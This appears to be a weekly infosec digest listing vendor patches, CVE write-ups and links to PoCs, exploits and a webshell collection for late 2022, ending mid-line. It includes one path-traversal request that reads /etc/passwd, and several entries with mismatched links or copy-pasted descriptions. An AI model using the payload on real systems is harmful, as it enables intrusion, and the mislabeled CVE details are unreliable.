\n\nSecurity Patched within a Week:\n \n > We track the latest Security advisery of top vendors and filter out high and critical vulnerability that has been patched within a week.\n\n \n- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last 2 Week(12th Oct - 18th October 2022) and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***\n \n - **Apple security advisery** : \n - A vulnerability(CVE-2022-22658) was found in Apple iOS up to 16.0.2 (Smartphone Operating System}. This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.\n \n - **Google security advisery** : \n - This Week google had released the advisety with [pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice willl be update these products.\n \n - **Adove security advisery** : \n - Adobe has released security update to address multiple vulnerabilities in Adobe software (Cold Fusion, Acrobat and Reader,Adobe Commerce and Magneto Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.\n \n - **Github security advisery** : \n - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.\n - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below. \n \n - Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.\n - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solutio etc.\n \n - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems\n\n - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems.\n\n\n - **Microsoft** \n - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)\n - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system.[Theres has been 55+ security that has been fixed in Microsoft products, pakage & application](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc\n\n
\n\n
\n\nCVE Analysis, writeups & reports: (7 analysis that matter in Last 1 Week)\n \n > Every week, we collect the recetly discovered Writeups & reports for CVE. \n\n \n - [Analysis: CVE-2022-40684 (CVSS score: 9.6)](https://www.helpnetsecurity.com/2022/10/14/cve-2022-40684-exploitation/)\n \n - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n - [Nuclei template CVE-2022-40684](https://t.me/hackgit/6129)https://github.com/NagliNagli/BountyTricks/blob/main/CVE-2022-40684.yaml)\n - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n\n - Vendor : **Fortinet**\n - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n - Patched : Apply updates per vendor instructions.\n - Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n \n - [Analysis:CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)\n - Vendor : **Microsoft Products**\n - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable. \n - Patched : Apply updates per vendor instructions.\n - Discription : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. The potential impact of an exploit of this vulnerability is considered to be very high.\n \n - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak) \n - [PoC : CVE-2022-36067](https://github.com/hacksysteam/CVE-2021-45067)\n \n - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**\n - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier)).\n - Discription/Issue/Flaw : Out of Bounds Read caused by treating ANSI string as Unicode in Acrobat Reader DC versions. This vulnerability can be exploited to leak sensitive information from the sandboxed adobe reader process.\n \n - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)\n - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/) \n - Target : **vm2 Javascript sandbox library**\n - Affected : version < 3.9.11\n - Discription : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. \n \n - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB) \n - Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .\n - Discription/Issue/Flaw : \nCVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.\n \n - [Analysis : Windows CLFS Zero-Day Vulnerability [CVE-2022-37969](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969) Part 1: Root Cause Analysi](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part)s \n - Target/Product: **Microsoft** \n - Discription/Issue/Flaw : \nCVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969\n \n \n - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)\n \n - Summary :-> [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)\n - Affected Vendors : \n \n \n - Discription: US authorities (NSA, FBI, CISA) expose the TOP 20 vulnerabilities actively exploited by Chinese state-sponsored attackers and NSA, CISA, and FBI urge organizations to apply the recommendations below\n \n - Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.\n - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n - Block obsolete or unused protocols at the network edge. \n - Upgrade or replace end-of-life devices.\n - Move toward the Zero Trust security model. \n - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.\n \n
\n\n
\n PoC for CVE & Exploit (Total : 5+ new 0-day matter in this week and 4 imoprtant from CVE last week) :\n \n > Every week we're tracking the recetly discovered Exploit and PoC for CVE. \n\n \n - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n \n - Target/Product: **Google Chrome**\n - Affected Version: Poc maker calims \"All\" but CVE says version < 80.0.3987.149\n - Solution : google-chrome-upgrade-latest \n - Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n \n - [PoC CVE-2022-41852(unoffical)](https://github.com/Warxim/CVE-2022-41852)\n \n - Target/Product: **Apache**\n - Discription : Remote Code Execution in JXPath Library. (For example, methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let user send input into the path parameter.) where CVE-2022-41852 allows attackers to execute code on the application server. You can read more about this [vulnerability here:](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n\n \n- Important **Poc from Last Week** :\n \n - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)\n \n - Target/Product: **Microsoft Exchage Server**\n - Affected Version: <8.3.1 \n - Discription : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of zerо-day bug in Microsoft Exchage Server which leads to RCE.\n \n - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC) \n - Target/Product: **Microsoft Exchage Server**\n - Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server. \n - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker) \n \n - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)\n - Target/Product: **PS5**\n - Exploit support firmwares : 4.03, 4.50, 4.51\n - Discription/Issue/Flaw : 🔥PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.\n \n - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)\n - Target/Product: **Dropbox**\n - Discription/Issue/Flaw : 🔥DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is a exploit for PID Reuse and Logical Error in DropBox's XPC service.\n \n
\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022\n\n\n\n \n Security Patched within a Week: # Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Microsoft, Adove, Github, Cisco, Linux(Ubuntu, kali etc), Firefox etc.\n\n CVE:ANALYSIS & POC: Cve-2022-34960, cve-2022-41218, HackerOne report #1672388- Gitlab, cve-2022–33987, \n Cve-2022–36635 and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n Cve Collection of jQuery UI XSS Payloads, nuclei-templete for cve-2022–35405, An updated list of PoC's cve's, \n \n PS5-4.03-Kernel-Exploit, cve-2022-41040, cve-2022-26726, cve-2022-30600, cve-2022-39197, cve-2021-29156 Exploit, \n Cve-2022-30206, cve-2022-2992, cve-2022-41208, cve-2022-2274 and cve-2022-36804\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21th Sept-27th Sept 2022\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within a week(21th Sep-27th Sep 2022). \n featuring releases from Apple, Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc.\n \n CVE:ANALYSIS & POC: CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, cve-2021-41653, CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n \n CVE POC (0-Day): CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc, \n CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.\n \t\n
\n\nSecurity Patched within a Week: \n\n- Here’s a look at the Latest Security (Severity : Critical or High) that has been patched in a Week(21th Sep-27th Sep 2022) and We highly recommend upgrading or updating from the origional source. \n \n- **WhatsApp** Security Advisories September Update : CVE-2022-36934(prior to v2.22.16.12) and CVE-2022-27492(prior to v2.22.16.2).\n- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. (Affected v18.x, v16.x, and v14.x )\n- Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages.\n - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.\n - **Ubuntu 20.04 LTS** & Ubuntu 18.04 LTS*: bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4 , linux-azure, linux-azure-5.15/5.4 , linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.\n\n - **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)\n- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)\n- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).\n- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).\n- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405(CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)\n- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)\n- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616) \n- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)\n\n
\n\n
\n\nCVE Analysis & PoC(9):\n\n\n - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)\n \n - Title -> Critical Cobalt Strike bug could lead to RCE attacks.\n - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)\n - Affected Version : prior to 4.7.1.\n - Discription/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.\n \n - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)\n - Title -> WhatsApp “zero-day exploit” news scare – what you need to know\n - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12\n - Discription/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.) \n \n - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)\n - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.\n - Affected Version : 7.2.9.\n - Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.\n \n - [Analysis: CVE-2022-40286](https://www.x86matthew.com/view_post?id=windows_seagate_lpe)\n - Title -> Exploiting a Seagate service to create a SYSTEM shell.\n - Target & Affected Version : Seagate Media Sync.\n - Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.\n \n - [Analysis : cve-2021-41653](https://k4m1ll0.com/cve-2021-41653.html)\n - [cve-2021-41653 video Poc](https://www.youtube.com/watch?v=GBuuGdeTKgw&feature=youtu.be)\n - Target/Product: **TP-Link**\n - Title: : TP-Link TL-WR840N EU v5 Remote Code Execution.\n - Discription/Issue : The goal was to achieve remote code execution on a TP-LINK TL-WR840N EU (V5) router. According to its papers, this version came out in 2017 and in case you're still susing the old version then we highly recommend upgrading the firmware to the latest version \"TL-WR840N(EU)_V5_211109\". It can be downloaded from the vendor homepage. \n\n
\n\n
\n CVE PoC, shell & Exploit (9) :\n\n \n \n - [CVE-2022-39197 Poc](https://github.com/Wh04m1001/ZoneAlarmEoP)\n - Target/Product: **Cobalt Strike**\n - Discription/Issue/Flaw : CVE-2022-39197 Cobalt Strike XSS vulnerability patch. Disable html support for swing by hooking the isHTMLString method of javax.swing.plaf.basic.\n \n - [CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) \n - Target/Product: **Atlassian Bitbucket **\n - Affected Version: <8.3.1 \n - Discription : The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances. The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n \n -[CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206) \n - Target/Product: **Microsoft**\n - Discription : PoC for Microsoft CVE-2022-30206: Windows Print Spooler Elevation of Privilege Vulnerability.\n \n - [CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282)\n - Target/Product: **Firefox**\n - Discription/Issue/Flaw : PoC for CVE-2022-28282 Firefox: heap-use-after-free in DocumentL10n::TranslateDocument.\n \n - [CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729)\n - Target/Product: **NorthSea**\n - Discription/Issue/Flaw : NorthSea decided to delay the disclosure of this POC for some reason.\n\n - [Cronos poc](https://github.com/Idov31/Cronos)\n - Discription : PoC for a new sleep obfuscation technique (based on [Ekko](https://github.com/Cracked5pider/Ekko)) leveraging waitable timers to RC4 encrypt the current process and change the permissions from RW to RX to evade memory scanners.\n \n \n - [CVE-2022-23743 Poc](https://github.com/Wh04m1001/ZoneAlarmEoP)\n - Target/Product: **Check Point's ZoneAlarm antivirus**\n - Affected Version: < 15.8.211.19229\n - Discription/Issue/Flaw : Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV.\n \n \n - [Webshell - Open source project](https://github.com/tennc/webshell) \n - Discription : Scripts that enable threat actors to compromise web servers and launch additional attacks. This project covers a variety of commonly used scriptsSuch as: asp, aspx, php, jsp, pl, py. NOTE : This project is only for testing, and all the consequences have nothing to do with authors.\n \n - [Windows10 - Custom Kernel Signers](https://github.com/HyperSine/Windows10-CustomKernelSigners ) \n - Discription : Load self-signed drivers without TestSigning or disable DSE. \n \n
\n---\n\n## CVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 14th September - 20th September 2022\n\n \n Security Patched : Latest IT security vulnerability patched within this week on selected company such as Whatsapp, Apple, Google, \n Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc. \n \n CVE:ANALYSIS & POC: CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps. \n \n \n CVE POC : CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709, \n CVE-2022-33980, CVE-2019-2215 & GwisinMsi poc based on Recreating an MSI Payload for Fun and no profit blog. \n\n
\n\n#### Security patched within a Week.(Trail)\n \n - Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability CVE-2022-32917\n - Code Aurora ACDB Audio Driver Stack-based Buffer Overflow Vulnerability CVE-2013-2597\n - Linux Kernel \n - Improper Input Validation Vulnerability CVE-2013-6282\n - Integer Overflow Vulnerability CVE-2013-2596\n - Privilege Escalation Vulnerability CVE-2013-2094\n - Github packages :\n - Multiple *Tensorflow(< 2.10.0)Packages*(tensorflow, tensorflow-cpu, tensorflow-gpu) are vulnerable to \n CHECK fail & segfault that can be used to trigger a denial of service attack.\n - oauthlib/oauthlib package (>=3.1.1) vulnerable to DoS when attacker provide malicious IPV6 URI.\n - In reactphp/http package (>= 0.7.0, < 1.7.0), when ReactPHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host- and __Secure- confused with cookies that decode to such prefix, thus leading to an attacker being able to forge cookie which is supposed to be secure. and It has been Fixed in reactphp/http v1.7.0.\n \n - Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability CVE-2022-37969\n - Microsoft Windows Remote Code Execution Vulnerability CVE-2010-2568\n - Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability CVE-2022-40139\n \n #### CVE Analysis & poc\n \n - [CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps](https://breakpoint.sh/posts/turning-your-computer-into-a-gps-tracker-with-apple-maps)\n - [CVE-2022-32883 Poc](https://github.com/breakpointHQ/CVE-2022-32883)\n - Target/Product: **Apple Maps**\n - Patched : Update your devices running iOS and iPadOS to iOS 15.7/16 and iPadOS 15.7 and macOS Monterey to 12.6.\n - Discription/Issue : Ron Masses found and disclosed 2 vulnerabilities in Apple Maps that allowed him to extract the accurate location of the user without authorization.\n \n - [GwisinMsi poc](https://github.com/ChoiSG/GwisinMsi)\n - Title: PoC MSI payload based on ASEC/AhnLab's blog - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n - Target/Product: **MSI**\n - Discription/Issue : The payload is based on the [Gwisin ransomware's MSI payload analysis of the AhnLab ASEC team's blog post](https://asec.ahnlab.com/en/37483/).\n \n - [CVE-2022-2588 Poc](https://github.com/sang-chu/CVE-2022-2588)\n - Target/Product: **Linux kernel**\n - Discription/Issue: Linux kernel cls_route UAF\n \n \n - [CVE-2022-34721 poc](https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721)\n - Title: Windows Internet Key Exchange (IKE) Protocol Extension Remote Code Execution.\n - Target/Product: **Windows Internet Key Exchange (IKE)**\n - Discription/Issue: The 3 vulnerabilities related to IKE Extension was patched on Patch Tuesday in September 2022. One of the vulnerabilities was found during IKE related research, which was patched by Yuki Chen.\n \n - [CVE-2022-36804 PoC](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE)\n - Target/Product: **Atlassian Bitbucket Server and Data Center**\n - Affected Version: All versions of Bitbucket Server and Data Center released before versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2, and 8.3.1 are vulnerable.\n - Discription/Issue : A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.\n \n \n - [CVE-2022-34709 poc](https://bugs.chromium.org/p/project-zero/issues/detail?id=2301)\n - Title: **Windows: Credential Guard ASN1 Decoder Type Confusion EoP**\n - Discription/Issue : A number of Kerberos CG APIs do not verify the ASN1 PDU type when decoding and encoding Kerberos ASN1 structures leading to type confusion and elevation of privilege. and window patched this CVE-2022-34709 - [Windows Defender Credential Guard Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709) with new version.\n\n \n - [CVE-2022-33980 poc](https://github.com/HKirito/CVE-2022-33980) \n - Target/Product: **Apache**\n - Affected Version: 2.4 through 2.7\n - Discription/Issue: Apache Commons RCE can use url,dns,script key-words to connect any server\n \n - [CVE-2019-2215 poc](https://github.com/ameetsaahu/Kernel-exploitation/tree/main/CVE-2019-2215)\n - Target/Product: **Linux kernel**\n - Affected Version: >= 4.14\n - Discription/Issue: Exploit for bad binder CVE-2019-2215 on x86_64 Android.\n \n
\n \n---\n
\n \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 07th Sept - 13th Sept 2022\n\n CVE POC : CVE02022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-20128, CVE-2022-20360, CVE-2022-27925, \n CVE-2022-37299,CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287. \n \n CVE Analysis : Latest IT security vulnerability patched on selected company such as Apple, Google, Microsoft, Github, \n Linux(Ubuntu, kali etc) & D-Link & CVE-2022-34169, CVE-2022-31474 Wordpress, \n \n Exploit : Mobile Mouse 3.6.0.4 Remote Code Execution, \n\n \n \n### CVE PoC :\n - [CVE-2022-22629 MacOS PoC](https://github.com/parsdefense/CVE-2022-22629)\n \n - Target & Affected Version: **MacOS - Safari <15.4**\n - Discription/Issue : This poc for the WebGL( A javascript API that is used in browsers to render 2D and 3D graphics.) bug that was patched in Safari 15.4 security updates.\n \n - [CVE-2022-37706 PoC](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)\n \n - Target & Affected Version: **Ubuntu 22.04 & Distro**\n - Discription/Issue : A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) \n \n - [CVE-2022-40297 PoC](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)\n \n - Target & Version : **Ubuntu Touch 16.04**\n - Title : Privilage escalation in Ubuntu Touch 16.04 - by PIN Bruteforce\n - Description : Ubuntu Touch allows you to \"protect\" devices with a 4-digit passcode. Such a code was set in a demonstration device. The problem is that the same 4-digit passcode then becomes a password that we can use with the sudo command and gain root privileges. This means that a malicious application can do us double harm:\n 1. Easily escalate privileges and take control of the device.\n 2. It can pass the screen unlock passcode to a third party.\n\n - [CVE-2022-20128 PoC](https://github.com/irsl/CVE-2022-20128)\n \n - Target : **Android Debug Bridge (adb) - directory traversal**\n - Description : Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.\n\n - [CVE-2022-20360 Poc](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)\n - Target : **Android setChecked LPE**\n\n - [CVE-2022-27925 Poc](https://github.com/mohamedbenchikh/CVE-2022-27925)\n \n - Target & Patched Version : **Zimbra released a patched on 8.8.15P31 and 9.0.0P24.**\n - Title : Zimbra Unauthenticated Remote Code Execution Exploit.\n - Description : CVE-2022-27925 was originally listed as an RCE exploit requiring authentication. When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\n \n - [CVE-2022-37299 Poc](https://vulners.com/cve/CVE-2022-37299)\n \n - Target & Version: **Shirne CMS 1.2.0. Path Traversal**\n - PoC: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test:\n GET 